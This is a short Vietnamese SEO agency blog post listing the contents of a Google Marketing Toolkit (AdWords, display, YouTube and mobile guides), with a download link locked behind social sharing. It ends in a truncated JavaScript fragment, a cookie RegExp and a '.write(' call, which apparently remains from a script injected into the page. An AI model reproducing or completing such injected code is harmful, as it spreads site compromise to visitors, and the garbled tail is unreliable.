Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Kiến thức > SEO > Tài liệu Marketing Toolkit của Google

Tài liệu Marketing Toolkit của Google

google prid

Pridio vừa nhận được món quà từ chương trình Google Engage. Trong chiếc USB của Google có bộ tài liệu rất hay về kinh doanh với Google, chủ yếu là Google Adwords.

Bộ tài liệu bao gồm:

 • Quảng cáo hiển thị – Quảng cáo hiển thị Campaign Optimiser
 • Quảng cáo hiển thị – GDN – Remarketing
 • Quảng cáo hiển thị – GDN – Targeting Options
 • Quảng cáo hiển thị – GDN – Why Quảng cáo hiển thị Matters
 • Quảng cáo hiển thị – Báo cáo VTC
 • Quảng cáo hiển thị – YouTube – Quảng cáo Google AdWords cho Video với TrueView
 • Quảng cáo hiển thị – YouTube Analytics
 • Quảng cáo hiển thị – Video được giới thiệu (YouTube Promoted Videos)
 • Mobile – Quảng cáo Mobile
 • Mobile – Quảng cáo qua tìm kiếm trên Mobile
 • Khác – API
 • Khác – Google+
 • Tìm kiếm – Tối ưu chuyển đổi
 • Tìm kiếm – Dynamic Tìm kiếm Ads
 • Tìm kiếm – Tối ưu CPC
 • Tìm kiếm – Tiện ích mở rộng địa điểm
 • Tìm kiếm – Sitelinks
 • Hướng dẫn làm Online Marketing cho doanh nghiệp nhỏ
 • Tại sao dùng Google AdWords
 • Một số Case Studies và tài liệu khác

[social-locker locker_id=”d4cb52ce67defeedd” theme=”blue” message=”Bạn vui lòng share lên mạng xã hội để thấy link down load” facebook=”true” likeurl=”CURRENT” google=”true” googleurl=”CURRENT” tweet=”true” tweettext=”” tweeturl=”CURRENT” follow=”true” linkedin=”true” linkedinurl=”CURRENT”]Download tại đây: http://pridio.com/Google%20Marketing%20Toolkit.rar[/social-locker] (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘